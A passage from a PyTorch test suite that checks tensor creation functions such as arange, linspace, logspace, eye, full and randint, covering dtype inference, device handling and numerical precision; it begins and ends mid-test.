        res1 = torch.arange(10)
        res2 = torch.arange(0, 10)
        self.assertEqual(res1, res2, atol=0, rtol=0)
        # Check arange for non-contiguous tensors.
        x = torch.zeros(2, 3)
        torch.arange(0, 4, out=x.narrow(1, 1, 2))
        res2 = torch.Tensor(((0, 0, 1), (0, 2, 3)))
        self.assertEqual(x, res2, atol=1e-16, rtol=0)
        # Check negative
        res1 = torch.Tensor((1, 0))
        res2 = torch.Tensor()
        torch.arange(1, -1, -1, out=res2)
        self.assertEqual(res1, res2, atol=0, rtol=0)
        # Equal bounds
        res1 = torch.ones(1)
        res2 = torch.Tensor()
        torch.arange(1, 0, -1, out=res2)
        self.assertEqual(res1, res2, atol=0, rtol=0)
        torch.arange(1, 2, 1, out=res2)
        self.assertEqual(res1, res2, atol=0, rtol=0)
        # FloatTensor
        res1 = torch.arange(0.6, 0.89, 0.1, out=torch.FloatTensor())
        self.assertEqual(res1, [0.6, 0.7, 0.8])
        res1 = torch.arange(1, 10, 0.3, out=torch.FloatTensor())
        self.assertEqual(res1.size(0), 30)
        self.assertEqual(res1[0], 1)
        self.assertEqual(res1[29], 9.7)
        # DoubleTensor
        res1 = torch.arange(0.6, 0.89, 0.1, out=torch.DoubleTensor())
        self.assertEqual(res1, [0.6, 0.7, 0.8])
        res1 = torch.arange(1, 10, 0.3, out=torch.DoubleTensor())
        self.assertEqual(res1.size(0), 30)
        self.assertEqual(res1[0], 1)
        self.assertEqual(res1[29], 9.7)
        # Bool Input matching numpy semantics
        r = torch.arange(True)
        self.assertEqual(r[0], 0)
        r2 = torch.arange(False)
        self.assertEqual(len(r2), 0)
        self.assertEqual(r.dtype, torch.int64)
        self.assertEqual(r2.dtype, torch.int64)
        # Check that it's exclusive
        r = torch.arange(0, 5)
        self.assertEqual(r.min(), 0)
        self.assertEqual(r.max(), 4)
        self.assertEqual(r.numel(), 5)
        r = torch.arange(0, 5, 2)
        self.assertEqual(r.min(), 0)
        self.assertEqual(r.max(), 4)
        self.assertEqual(r.numel(), 3)
        r1 = torch.arange(0, 5 + 1e-6)
        # NB: without the dtype, we'll infer output type to be int64
        r2 = torch.arange(0, 5, dtype=torch.float32)
        r3 = torch.arange(0, 5 - 1e-6)
        self.assertEqual(r1[:-1], r2, atol=0, rtol=0)
        self.assertEqual(r2, r3, atol=0, rtol=0)
        r1 = torch.arange(10, -1 + 1e-6, -1)
        # NB: without the dtype, we'll infer output type to be int64
        r2 = torch.arange(10, -1, -1, dtype=torch.float32)
        r3 = torch.arange(10, -1 - 1e-6, -1)
        self.assertEqual(r1, r2, atol=0, rtol=0)
        self.assertEqual(r2, r3[:-1], atol=0, rtol=0)
        # Test Rounding Errors
        line = torch.zeros(size=(1, 49))
        self.assertWarnsRegex(UserWarning, 'The out tensor will be resized',
                              lambda: torch.arange(-1, 1, 2. / 49, dtype=torch.float32, out=line))
        self.assertEqual(line.shape, [50])
        x = torch.empty(1).expand(10)
        # Expanded (overlapping-memory) tensors cannot be used as out=.
        self.assertRaises(RuntimeError, lambda: torch.arange(10, out=x))
        msg = "unsupported range"
        self.assertRaisesRegex(RuntimeError, msg, lambda: torch.arange(0, float('inf')))
        self.assertRaisesRegex(RuntimeError, msg, lambda: torch.arange(float('inf')))
        # NOTE(review): this loop variable shadows the `device` parameter.
        for device in torch.testing.get_all_device_types():
            self.assertRaisesRegex(RuntimeError, msg, lambda: torch.arange(-5, float('nan'), device=device))
            # check with step size
            self.assertRaisesRegex(RuntimeError, msg, lambda: torch.arange(0, float('-inf'), -1, device=device))
            self.assertRaisesRegex(RuntimeError, msg, lambda: torch.arange(0, float('inf'), device=device))
            self.assertRaisesRegex(RuntimeError, msg, lambda: torch.arange(float('-inf'), 10, device=device))
            self.assertRaisesRegex(RuntimeError, msg, lambda: torch.arange(float('nan'), 10, device=device))
            self.assertRaisesRegex(RuntimeError, msg, lambda: torch.arange(float('inf'), device=device))
            self.assertRaisesRegex(RuntimeError, msg, lambda: torch.arange(float('nan'), device=device))
            self.assertRaisesRegex(
                RuntimeError, "overflow",
                lambda: torch.arange(1.175494351e-38, 3.402823466e+38, device=device))
            # check that it holds a consistent output shape on precision-cornered step sizes
            d = torch.arange(-4.0, 4.0, 0.01, dtype=torch.float32, device=device)
            self.assertEqual(d.shape[0], 800)
# TODO: this test should be updated
    @onlyCPU
    def test_arange_inference(self, device):
        """Dtype inference of torch.arange from python scalars and 0-d tensors
        (any float argument -> default dtype, otherwise int64)."""
        saved_dtype = torch.get_default_dtype()
        torch.set_default_dtype(torch.float32)
        # end only
        self.assertIs(torch.float32, torch.arange(1.).dtype)
        self.assertIs(torch.float32, torch.arange(torch.tensor(1.)).dtype)
        self.assertIs(torch.float32, torch.arange(torch.tensor(1., dtype=torch.float64)).dtype)
        self.assertIs(torch.int64, torch.arange(1).dtype)
        self.assertIs(torch.int64, torch.arange(torch.tensor(1)).dtype)
        self.assertIs(torch.int64, torch.arange(torch.tensor(1, dtype=torch.int16)).dtype)
        # start, end, [step]
        self.assertIs(torch.float32, torch.arange(1., 3).dtype)
        self.assertIs(torch.float32, torch.arange(torch.tensor(1., dtype=torch.float64), 3).dtype)
        self.assertIs(torch.float32, torch.arange(1, 3.).dtype)
        self.assertIs(torch.float32, torch.arange(torch.tensor(1, dtype=torch.int16), torch.tensor(3.)).dtype)
        self.assertIs(torch.float32, torch.arange(1, 3, 1.).dtype)
        self.assertIs(torch.float32,
                      torch.arange(torch.tensor(1),
                                   torch.tensor(3, dtype=torch.int16),
                                   torch.tensor(1., dtype=torch.float64)).dtype)
        self.assertIs(torch.int64, torch.arange(1, 3).dtype)
        self.assertIs(torch.int64, torch.arange(torch.tensor(1), 3).dtype)
        self.assertIs(torch.int64, torch.arange(torch.tensor(1), torch.tensor(3, dtype=torch.int16)).dtype)
        self.assertIs(torch.int64, torch.arange(1, 3, 1).dtype)
        self.assertIs(torch.int64,
                      torch.arange(torch.tensor(1),
                                   torch.tensor(3),
                                   torch.tensor(1, dtype=torch.int16)).dtype)
        # Restore the saved global default dtype.
        torch.set_default_dtype(saved_dtype)
def test_empty_strided(self, device):
for shape in [(2, 3, 4), (0, 2, 0)]:
# some of these cases are pretty strange, just verifying that if as_strided
# allows them then empty_strided can as well.
for strides in [(12, 4, 1), (2, 4, 6), (0, 0, 0)]:
empty_strided = torch.empty_strided(shape, strides, device=device)
# as_strided checks the storage size is big enough to support such a strided tensor;
# instead of repeating this calculation, we just use empty_strided which does the same
# calculation when setting the storage size.
as_strided = torch.empty(empty_strided.storage().size(),
device=device).as_strided(shape, strides)
self.assertEqual(empty_strided.shape, as_strided.shape)
self.assertEqual(empty_strided.stride(), as_strided.stride())
def test_strided_mismatched_stride_shape(self, device):
for shape, strides in [((1, ), ()), ((1, 2), (1, ))]:
with self.assertRaisesRegex(RuntimeError, "mismatch in length of strides and shape"):
torch.tensor(0.42, device=device).as_strided(shape, strides)
with self.assertRaisesRegex(RuntimeError, "mismatch in length of strides and shape"):
torch.tensor(0.42, device=device).as_strided_(shape, strides)
def test_empty_tensor_props(self, device):
sizes = [(0,), (0, 3), (5, 0), (5, 0, 3, 0, 2), (0, 3, 0, 2), (0, 5, 0, 2, 0)]
for size in sizes:
x = torch.empty(tuple(size), device=device)
self.assertEqual(size, x.shape)
self.assertTrue(x.is_contiguous())
size_ones_instead_of_zeros = (x if x != 0 else 1 for x in size)
y = torch.empty(tuple(size_ones_instead_of_zeros), device=device)
self.assertEqual(x.stride(), y.stride())
def test_eye(self, device):
for dtype in torch.testing.get_all_dtypes():
if dtype == torch.bfloat16:
continue
for n, m in product([3, 5, 7], repeat=2):
# Construct identity using diagonal and fill
res1 = torch.eye(n, m, device=device, dtype=dtype)
naive_eye = torch.zeros(n, m, dtype=dtype, device=device)
naive_eye.diagonal(dim1=-2, dim2=-1).fill_(1)
self.assertEqual(naive_eye, res1)
# Check eye_out outputs
res2 = torch.empty(0, device=device, dtype=dtype)
torch.eye(n, m, out=res2)
self.assertEqual(res1, res2)
    @unittest.skipIf(not TEST_NUMPY, "NumPy not found")
    @precisionOverride({torch.float: 1e-8, torch.double: 1e-10})
    @dtypes(*(torch.testing.get_all_fp_dtypes(include_half=False, include_bfloat16=False) +
              torch.testing.get_all_complex_dtypes()))
    def test_linspace_vs_numpy(self, device, dtype):
        """torch.linspace must agree with np.linspace across step counts, for
        float and complex dtypes; endpoints must match exactly."""
        start = -0.0316082797944545745849609375 + (0.8888888888j if dtype.is_complex else 0)
        end = .0315315723419189453125 + (0.444444444444j if dtype.is_complex else 0)
        for steps in [1, 2, 3, 5, 11, 256, 257, 2**22]:
            t = torch.linspace(start, end, steps, device=device, dtype=dtype)
            a = np.linspace(start, end, steps, dtype=torch_to_numpy_dtype_dict[dtype])
            t = t.cpu()
            self.assertEqual(t, torch.from_numpy(a))
            # Endpoints must equal numpy's exactly, not merely within tolerance.
            self.assertTrue(t[0].item() == a[0])
            self.assertTrue(t[steps - 1].item() == a[steps - 1])
    @unittest.skipIf(not TEST_NUMPY, "NumPy not found")
    @precisionOverride({torch.float: 1e-6, torch.double: 1e-10})
    @dtypes(torch.float, torch.double)
    def test_logspace_vs_numpy(self, device, dtype):
        """torch.logspace must agree with np.logspace (values and endpoints)
        across step counts."""
        start = -0.0316082797944545745849609375
        end = .0315315723419189453125
        for steps in [1, 2, 3, 5, 11, 256, 257, 2**22]:
            t = torch.logspace(start, end, steps, device=device, dtype=dtype)
            a = np.logspace(start, end, steps, dtype=torch_to_numpy_dtype_dict[dtype])
            t = t.cpu()
            self.assertEqual(t, torch.from_numpy(a))
            self.assertEqual(t[0], a[0])
            self.assertEqual(t[steps - 1], a[steps - 1])
@largeCUDATensorTest('16GB')
def test_range_factories_64bit_indexing(self, device):
bigint = 2 ** 31 + 1
t = torch.arange(bigint, dtype=torch.long, device=device)
self.assertEqual(t[-1].item(), bigint - 1)
del t
t = torch.linspace(0, 1, bigint, dtype=torch.float, device=device)
self.assertEqual(t[-1].item(), 1)
del t
t = torch.logspace(0, 1, bigint, 2, dtype=torch.float, device=device)
self.assertEqual(t[-1].item(), 2)
del t
    @onlyOnCPUAndCUDA
    def test_tensor_ctor_device_inference(self, device):
        """tensor/as_tensor and sparse_coo_tensor infer their device from their
        tensor inputs, and CPU inputs stay on the CPU even inside a CUDA
        device context."""
        torch_device = torch.device(device)
        values = torch.tensor((1, 2, 3), device=device)

        # Tests tensor and as_tensor
        # Warnings (e.g. deprecation chatter) are suppressed so they cannot
        # interfere with the device checks below.
        for op in (torch.tensor, torch.as_tensor):
            with warnings.catch_warnings():
                warnings.simplefilter("ignore")
                self.assertEqual(op(values).device, torch_device)
                self.assertEqual(op(values, dtype=torch.float64).device, torch_device)

                if self.device_type == 'cuda':
                    with torch.cuda.device(device):
                        # A CPU input is not moved by the active CUDA context.
                        self.assertEqual(op(values.cpu()).device, torch.device('cpu'))

        # Tests sparse ctor
        indices = torch.tensor([[0, 1, 1],
                                [2, 0, 1],
                                [2, 1, 0]], device=device)
        sparse_size = (3, 3, 3)

        sparse_default = torch.sparse_coo_tensor(indices, values, sparse_size)
        self.assertEqual(sparse_default.device, torch_device)

        # An explicit dtype must not change the inferred device.
        sparse_with_dtype = torch.sparse_coo_tensor(indices, values, sparse_size, dtype=torch.float64)
        self.assertEqual(sparse_with_dtype.device, torch_device)

        if self.device_type == 'cuda':
            with torch.cuda.device(device):
                sparse_with_dtype = torch.sparse_coo_tensor(indices.cpu(), values.cpu(),
                                                            sparse_size, dtype=torch.float64)
                self.assertEqual(sparse_with_dtype.device, torch.device('cpu'))
    def test_tensor_factories_empty(self, device):
        """Every factory function must accept shapes containing zero-length
        dimensions (and reject dtypes it does not support)."""
        # ensure we can create empty tensors from each factory function
        shapes = [(5, 0, 1), (0,), (0, 0, 1, 0, 2, 0, 0)]

        for shape in shapes:
            for dt in torch.testing.get_all_dtypes():

                self.assertEqual(shape, torch.zeros(shape, device=device, dtype=dt).shape)
                self.assertEqual(shape, torch.zeros_like(torch.zeros(shape, device=device, dtype=dt)).shape)
                self.assertEqual(shape, torch.full(shape, 3, device=device, dtype=dt).shape)
                self.assertEqual(shape, torch.full_like(torch.zeros(shape, device=device, dtype=dt), 3).shape)
                self.assertEqual(shape, torch.ones(shape, device=device, dtype=dt).shape)
                self.assertEqual(shape, torch.ones_like(torch.zeros(shape, device=device, dtype=dt)).shape)
                self.assertEqual(shape, torch.empty(shape, device=device, dtype=dt).shape)
                self.assertEqual(shape, torch.empty_like(torch.zeros(shape, device=device, dtype=dt)).shape)
                self.assertEqual(shape, torch.empty_strided(shape, (0,) * len(shape), device=device, dtype=dt).shape)

                if dt == torch.bfloat16 and device.startswith('cuda') and IS_WINDOWS:
                    # randint on CUDA bfloat16 is broken on Windows.
                    # TODO: https://github.com/pytorch/pytorch/issues/33793
                    self.assertRaises(RuntimeError, lambda: torch.randint(6, shape, device=device, dtype=dt).shape)
                elif dt == torch.bool:
                    # bool randint is limited to high == 2 (values 0/1).
                    self.assertEqual(shape, torch.randint(2, shape, device=device, dtype=dt).shape)
                    self.assertEqual(shape, torch.randint_like(torch.zeros(shape, device=device, dtype=dt), 2).shape)
                elif dt.is_complex:
                    # randint does not support complex dtypes.
                    self.assertRaises(RuntimeError, lambda: torch.randint(6, shape, device=device, dtype=dt).shape)
                else:
                    self.assertEqual(shape, torch.randint(6, shape, device=device, dtype=dt).shape)
                    self.assertEqual(shape, torch.randint_like(torch.zeros(shape, device=device, dtype=dt), 6).shape)

                # rand only supports floating-point and complex dtypes.
                if dt not in {torch.double, torch.float, torch.half, torch.bfloat16, torch.complex64, torch.complex128}:
                    self.assertRaises(RuntimeError, lambda: torch.rand(shape, device=device, dtype=dt).shape)

                # randn is exercised only for float/double and complex here.
                if dt == torch.double or dt == torch.float or dt.is_complex:
                    self.assertEqual(shape, torch.randn(shape, device=device, dtype=dt).shape)
                    self.assertEqual(shape, torch.randn_like(torch.zeros(shape, device=device, dtype=dt)).shape)

        # Zero-element variants of the remaining factory functions.
        self.assertEqual((0,), torch.arange(0, device=device).shape)
        self.assertEqual((0, 0), torch.eye(0, device=device).shape)
        self.assertEqual((0, 0), torch.eye(0, 0, device=device).shape)
        self.assertEqual((5, 0), torch.eye(5, 0, device=device).shape)
        self.assertEqual((0, 5), torch.eye(0, 5, device=device).shape)
        self.assertEqual((0,), torch.linspace(1, 1, 0, device=device).shape)
        self.assertEqual((0,), torch.logspace(1, 1, 0, device=device).shape)
        self.assertEqual((0,), torch.randperm(0, device=device).shape)
        self.assertEqual((0,), torch.bartlett_window(0, device=device).shape)
        self.assertEqual((0,), torch.bartlett_window(0, periodic=False, device=device).shape)
        self.assertEqual((0,), torch.hamming_window(0, device=device).shape)
        self.assertEqual((0,), torch.hann_window(0, device=device).shape)
        # Nested empty lists produce a (1, 1, 0) tensor.
        self.assertEqual((1, 1, 0), torch.tensor([[[]]], device=device).shape)
        self.assertEqual((1, 1, 0), torch.as_tensor([[[]]], device=device).shape)
@onlyCUDA
def test_tensor_factory_gpu_type_inference(self, device):
saved_type = torch.Tensor().type()
torch.set_default_tensor_type(torch.cuda.DoubleTensor)
torch.set_default_dtype(torch.float32)
self.assertIs(torch.float32, torch.tensor(0.).dtype)
self.assertEqual(torch.device(device), torch.tensor(0.).device)
torch.set_default_dtype(torch.float64)
self.assertIs(torch.float64, torch.tensor(0.).dtype)
self.assertEqual(torch.device(device), torch.tensor(0.).device)
torch.set_default_tensor_type(saved_type)
@onlyCUDA
def test_tensor_factory_gpu_type(self, device):
saved_type = torch.Tensor().type()
torch.set_default_tensor_type(torch.cuda.FloatTensor)
x = torch.zeros((5, 5))
self.assertIs(torch.float32, x.dtype)
self.assertTrue(x.is_cuda)
torch.set_default_tensor_type(torch.cuda.DoubleTensor)
x = torch.zeros((5, 5))
self.assertIs(torch.float64, x.dtype)
self.assertTrue(x.is_cuda)
torch.set_default_tensor_type(saved_type)
@skipCPUIf(True, 'compares device with cpu')
@dtypes(torch.int, torch.long, torch.float, torch.double)
def test_arange_device_vs_cpu(self, device, dtype):
cpu_tensor = torch.arange(0, 10, dtype=dtype, device='cpu')
device_tensor = torch.arange(0, 10, dtype=dtype, device=device)
self.assertEqual(cpu_tensor, device_tensor)
@onlyCUDA
@skipCUDAIfNotRocm
def test_arange_bfloat16(self, device):
ref_tensor = torch.tensor([0, 1, 2, 3], dtype=torch.bfloat16, device=device)
bfloat16_tensor = torch.arange(0, 4, dtype=torch.bfloat16, device=device)
self.assertEqual(ref_tensor, bfloat16_tensor)
# step=2
ref_tensor = torch.tensor([0, 2, 4], dtype=torch.bfloat16, device=device)
bfloat16_tensor = torch.arange(0, 6, step=2, dtype=torch.bfloat16, device=device)
self.assertEqual(ref_tensor, bfloat16_tensor)
    @dtypes(*torch.testing.get_all_dtypes(include_bool=False, include_half=False))
    @dtypesIfCUDA(*torch.testing.get_all_dtypes(include_bool=False, include_half=True))
    def test_linspace(self, device, dtype):
        """Broad torch.linspace coverage: out= agreement, integer-valued
        sequences, error cases, per-dtype precision, descending ranges, large
        tensors, and non-contiguous out tensors."""
        _from = random.random()
        to = _from + random.random()
        res1 = torch.linspace(_from, to, 137, device=device, dtype=dtype)
        res2 = torch.tensor((), device=device, dtype=dtype)
        # out= must produce exactly the same values as the returning overload.
        torch.linspace(_from, to, 137, dtype=dtype, out=res2)
        self.assertEqual(res1, res2, atol=0, rtol=0)

        # small tensor
        self.assertEqual(torch.linspace(10, 20, 11, device=device, dtype=dtype),
                         torch.tensor(list(range(10, 21)), device=device, dtype=dtype))
        # large tensor
        if dtype not in (torch.int8, torch.uint8):
            self.assertEqual(torch.linspace(10, 2000, 1991, device=device, dtype=dtype),
                             torch.tensor(list(range(10, 2001)), device=device, dtype=dtype))

        # Vectorization on non-contiguous tensors
        if dtype not in (torch.int8, torch.uint8):  # int8 and uint8 are too small for this test
            res = torch.rand(3, 3, 1000, device=device).to(dtype)
            res = res.permute(2, 0, 1)
            # out= here carries the device/dtype and the non-contiguous layout.
            torch.linspace(0, 1000 * 3 * 3, 1000 * 3 * 3, out=res)
            self.assertEqual(res.flatten(), torch.linspace(0, 1000 * 3 * 3, 1000 * 3 * 3, device=device, dtype=dtype))

        # Negative step counts are rejected.
        self.assertRaises(RuntimeError, lambda: torch.linspace(0, 1, -1, device=device, dtype=dtype))
        # steps = 1
        self.assertEqual(torch.linspace(0, 1, 1, device=device, dtype=dtype),
                         torch.zeros(1, device=device, dtype=dtype), atol=0, rtol=0)
        # steps = 0
        self.assertEqual(torch.linspace(0, 1, 0, device=device, dtype=dtype).numel(), 0, atol=0, rtol=0)

        # Check linspace for generating the correct output for each dtype.
        start = 0 if dtype == torch.uint8 else -100
        expected_lin = torch.tensor([start + .5 * i for i in range(401)], device=device, dtype=torch.double)
        actual_lin = torch.linspace(start, start + 200, 401, device=device, dtype=dtype)
        # If on GPU, allow for minor error depending on dtype.
        tol = 0.
        if device != 'cpu':
            if dtype == torch.half:
                tol = 1e-1
            elif dtype == torch.float:
                tol = 1e-5
            elif dtype == torch.double:
                tol = 1e-10

        self.assertEqual(expected_lin.to(dtype), actual_lin, atol=tol, rtol=0)

        # Check linspace for generating with start > end.
        self.assertEqual(torch.linspace(2, 0, 3, device=device, dtype=dtype),
                         torch.tensor((2, 1, 0), device=device, dtype=dtype),
                         atol=0, rtol=0)

        # Create non-complex tensor from complex numbers
        if not dtype.is_complex:
            self.assertRaises(RuntimeError, lambda: torch.linspace(1j, 2j, 3, device=device, dtype=dtype))

        # Check for race condition (correctness when applied on a large tensor).
        if dtype not in (torch.int8, torch.uint8, torch.int16, torch.half, torch.bfloat16):
            y = torch.linspace(0, 999999 + (999999j if dtype.is_complex else 0),
                               1000000, device=device, dtype=dtype)
            # A strictly increasing result implies each element was computed
            # independently (no overlapping writes).
            if dtype.is_complex:
                cond = torch.logical_and(y[:-1].real < y[1:].real, y[:-1].imag < y[1:].imag)
            else:
                cond = y[:-1] < y[1:]
            correct = all(cond)
            self.assertTrue(correct)

        # Check linspace for non-contiguous tensors.
        x = torch.zeros(2, 3, device=device, dtype=dtype)
        y = torch.linspace(0, 3, 4, out=x.narrow(1, 1, 2), dtype=dtype)
        self.assertEqual(x, torch.tensor(((0, 0, 1), (0, 2, 3)), device=device, dtype=dtype), atol=0, rtol=0)
def test_linspace_deduction(self, device):
# Test deduction from input parameters.
self.assertEqual(torch.linspace(1, 2, device=device).dtype, torch.float32)
self.assertEqual(torch.linspace(1., 2, device=device).dtype, torch.float32)
self.assertEqual(torch.linspace(1., -2., device=device).dtype, torch.float32)
# TODO: Need fix
with self.assertRaises(RuntimeError):
torch.linspace(1j, -2j, device=device)
# The implementation of linspace+logspace goes through a different path
# when the steps arg is equal to 0 or 1. For other values of `steps`
# they call specialized linspace (or logspace) kernels.
LINSPACE_LOGSPACE_SPECIAL_STEPS = [0, 1]
# NOTE [Linspace+Logspace precision override]
# Our Linspace and logspace torch.half CUDA kernels are not very precise.
# Since linspace/logspace are deterministic, we can compute an expected
# amount of error (by testing without a precision override), adding a tiny
# amount (EPS) to that, and using that value as the override.
LINSPACE_LOGSPACE_EXTRA_EPS = 1e-5
# Compares linspace device vs. cpu
def _test_linspace(self, device, dtype, steps):
a = torch.linspace(0, 10, steps=steps, dtype=dtype, device=device)
b = torch.linspace(0, 10, steps=steps)
self.assertEqual(a, b, exact_dtype=False)
    # See NOTE [Linspace+Logspace precision override]
    @skipCPUIf(True, "compares with CPU")
    @precisionOverride({torch.half: 0.0039 + LINSPACE_LOGSPACE_EXTRA_EPS})
    @dtypesIfCUDA(*(torch.testing.get_all_fp_dtypes() + torch.testing.get_all_complex_dtypes()))
    def test_linspace_device_vs_cpu(self, device, dtype):
        """Compare a 10-step linspace on this device against the CPU result."""
        self._test_linspace(device, dtype, steps=10)
@skipCPUIf(True, "compares with CPU")
@dtypesIfCUDA(*(torch.testing.get_all_fp_dtypes() + torch.testing.get_all_complex_dtypes()))
def test_linspace_special_steps(self, device, dtype):
for steps in self.LINSPACE_LOGSPACE_SPECIAL_STEPS:
self._test_linspace(device, dtype, steps=steps)
# Compares logspace device vs cpu
def _test_logspace(self, device, dtype, steps):
a = torch.logspace(1, 1.1, steps=steps, dtype=dtype, device=device)
b = torch.logspace(1, 1.1, steps=steps)
self.assertEqual(a, b, exact_dtype=False)
# Compares logspace device vs cpu
def _test_logspace_base2(self, device, dtype, steps):
a = torch.logspace(1, 1.1, steps=steps, base=2, dtype=dtype, device=device)
b = torch.logspace(1, 1.1, steps=steps, base=2)
self.assertEqual(a, b, exact_dtype=False)
    # See NOTE [Linspace+Logspace precision override]
    @skipCPUIf(True, "compares with CPU")
    @precisionOverride({torch.half: 0.025 + LINSPACE_LOGSPACE_EXTRA_EPS})
    @dtypesIfCUDA(torch.half, torch.float, torch.double)
    @dtypes(torch.float, torch.double)
    def test_logspace_device_vs_cpu(self, device, dtype):
        """Compare a 10-step default-base logspace against the CPU result."""
        self._test_logspace(device, dtype, steps=10)
    # See NOTE [Linspace+Logspace precision override]
    @skipCPUIf(True, "compares with CPU")
    @precisionOverride({torch.half: 0.0201 + LINSPACE_LOGSPACE_EXTRA_EPS})
    @dtypesIfCUDA(torch.half, torch.float, torch.double)
    @dtypes(torch.float, torch.double)
    def test_logspace_base2(self, device, dtype):
        """Compare a 10-step base-2 logspace against the CPU result."""
        self._test_logspace_base2(device, dtype, steps=10)
@skipCPUIf(True, "compares with CPU")
@dtypesIfCUDA(torch.half, torch.float, torch.double)
@dtypes(torch.float, torch.double)
def test_logspace_special_steps(self, device, dtype):
for steps in self.LINSPACE_LOGSPACE_SPECIAL_STEPS:
self._test_logspace(device, dtype, steps=steps)
self._test_logspace_base2(device, dtype, steps=steps)
    @precisionOverride({torch.half: 1e-1, torch.float: 1e-5, torch.double: 1e-10})
    @dtypes(torch.uint8, torch.int8, torch.short, torch.int, torch.long, torch.float, torch.double)
    @dtypesIfCUDA(torch.uint8, torch.int8, torch.short, torch.int, torch.long, torch.half, torch.float, torch.double)
    def test_logspace(self, device, dtype):
        """Broad torch.logspace coverage: out= agreement, error cases,
        precision with base 2, descending ranges, and non-contiguous out."""
        _from = random.random()
        to = _from + random.random()
        res1 = torch.logspace(_from, to, 137, device=device, dtype=dtype)
        res2 = torch.tensor((), device=device, dtype=dtype)
        # out= must reproduce the returning overload exactly.
        torch.logspace(_from, to, 137, device=device, dtype=dtype, out=res2)
        self.assertEqual(res1, res2, atol=0, rtol=0)
        # Negative step counts are rejected; one step yields base**start == 1.
        self.assertRaises(RuntimeError, lambda: torch.logspace(0, 1, -1, device=device, dtype=dtype))
        self.assertEqual(torch.logspace(0, 1, 1, device=device, dtype=dtype),
                         torch.ones(1, device=device, dtype=dtype), atol=0, rtol=0)

        # Check precision - start, stop and base are chosen to avoid overflow
        # steps is chosen so that step size is not subject to rounding error
        # a tolerance is needed for gpu tests due to differences in computation
        atol = None
        rtol = None
        if self.device_type == 'cpu':
            atol = 0
            rtol = 0
        self.assertEqual(torch.tensor([2. ** (i / 8.) for i in range(49)], device=device, dtype=dtype),
                         torch.logspace(0, 6, steps=49, base=2, device=device, dtype=dtype),
                         atol=atol, rtol=rtol)

        # Check non-default base=2
        self.assertEqual(torch.logspace(1, 1, 1, 2, device=device, dtype=dtype),
                         torch.ones(1, device=device, dtype=dtype) * 2)
        self.assertEqual(torch.logspace(0, 2, 3, 2, device=device, dtype=dtype),
                         torch.tensor((1, 2, 4), device=device, dtype=dtype))

        # Check logspace_ for generating with start > end.
        self.assertEqual(torch.logspace(1, 0, 2, device=device, dtype=dtype),
                         torch.tensor((10, 1), device=device, dtype=dtype), atol=0, rtol=0)

        # Check logspace_ for non-contiguous tensors.
        x = torch.zeros(2, 3, device=device, dtype=dtype)
        y = torch.logspace(0, 3, 4, base=2, device=device, dtype=dtype, out=x.narrow(1, 1, 2))
        self.assertEqual(x, torch.tensor(((0, 1, 2), (0, 4, 8)), device=device, dtype=dtype), atol=0, rtol=0)
@onlyOnCPUAndCUDA
@dtypes(torch.half, torch.float, torch.double)
def test_full_inference(self, device, dtype):
size = (2, 2)
prev_default = torch.get_default_dtype()
torch.set_default_dtype(dtype)
# Tests bool fill value inference
t = torch.full(size, True)
self.assertEqual(t.dtype, torch.bool)
# Tests integer fill value inference
t = torch.full(size, 1)
self.assertEqual(t.dtype, torch.long)
# Tests float fill value inference
t = torch.full(size, 1.)
self.assertEqual(t.dtype, dtype)
# Tests complex inference
t = torch.full(size, (1 + 1j))
ctype = torch.complex128 if dtype is torch.double else torch.complex64
self.assertEqual(t.dtype, ctype)
torch.set_default_dtype(prev_default)
def test_full_out(self, device):
size = (5,)
o = torch.empty(size, device=device, dtype=torch.long)
# verifies dtype/out conflict throws a RuntimeError
with self.assertRaises(RuntimeError):
torch.full(o.shape, 1., dtype=torch.float, out=o)
# verifies out dtype overrides inference
self.assertEqual(torch.full(o.shape, 1., out=o).dtype, o.dtype)
self.assertEqual(torch.full(size, 1, out=o).dtype, o.dtype)
# Class for testing random tensor creation ops, like torch.randint
class TestRandomTensorCreation(TestCase):
    """Tests for random tensor creation ops, like torch.randint."""
    exact_dtype = True

    # TODO: this test should be updated
    @onlyCPU
    def test_randint_inference(self, device):
        """randint infers int64 unless overridden by dtype= or an out= tensor."""
        size = (2, 1)
        for args in [(3,), (1, 3)]:  # (low,) and (low, high)
            # Plain, explicit-layout, and explicit-generator calls infer int64.
            self.assertIs(torch.int64, torch.randint(*args, size=size).dtype)
            self.assertIs(torch.int64, torch.randint(*args, size=size, layout=torch.strided).dtype)
            self.assertIs(torch.int64, torch.randint(*args, size=size, generator=torch.default_generator).dtype)
            self.assertIs(torch.float32, torch.randint(*args, size=size, dtype=torch.float32).dtype)
            # The dtype of an out= tensor takes precedence over inference.
            out = torch.empty(size, dtype=torch.float32)
            self.assertIs(torch.float32, torch.randint(*args, size=size, out=out).dtype)
            self.assertIs(torch.float32, torch.randint(*args, size=size, out=out, dtype=torch.float32).dtype)
            out = torch.empty(size, dtype=torch.int64)
            self.assertIs(torch.int64, torch.randint(*args, size=size, out=out).dtype)
            self.assertIs(torch.int64, torch.randint(*args, size=size, out=out, dtype=torch.int64).dtype)

    # TODO: this test should be updated
    @onlyCPU
    def test_randint(self, device):
        """All four randint overloads — (low, high)/(high,) crossed with
        return/out= — produce identical values when re-seeded, and all values
        fall in [0, 6)."""
        SIZE = 100

        def seed(generator):
            # Seed either the global RNG (generator is None) or the given one.
            if generator is None:
                torch.manual_seed(123456)
            else:
                generator.manual_seed(123456)
            return generator

        for generator in (None, torch.Generator()):
            # Re-seed before each draw so all four calls see the same stream.
            generator = seed(generator)
            res1 = torch.randint(0, 6, (SIZE, SIZE), generator=generator)
            res2 = torch.empty((), dtype=torch.int64)
            generator = seed(generator)
            torch.randint(0, 6, (SIZE, SIZE), generator=generator, out=res2)
            generator = seed(generator)
            res3 = torch.randint(6, (SIZE, SIZE), generator=generator)
            res4 = torch.empty((), dtype=torch.int64)
            generator = seed(generator)
            torch.randint(6, (SIZE, SIZE), out=res4, generator=generator)
            self.assertEqual(res1, res2)
            self.assertEqual(res1, res3)
            self.assertEqual(res1, res4)
            self.assertEqual(res2, res3)
            self.assertEqual(res2, res4)
            self.assertEqual(res3, res4)
            self.assertTrue((res1 < 6).all().item())
            self.assertTrue((res1 >= 0).all().item())

    @dtypes(torch.half, torch.float, torch.double,
            torch.complex32, torch.complex64, torch.complex128)
    def test_randn(self, device, dtype):
        """Seeded randn matches between the return and out= overloads,
        including the zero-size case."""
        SIZE = 100
        for size in [0, SIZE]:
            torch.manual_seed(123456)
            res1 = torch.randn(size, size, dtype=dtype, device=device)
            res2 = torch.tensor([], dtype=dtype, device=device)
            torch.manual_seed(123456)
            # out= inherits res2's dtype/device; only values are drawn here.
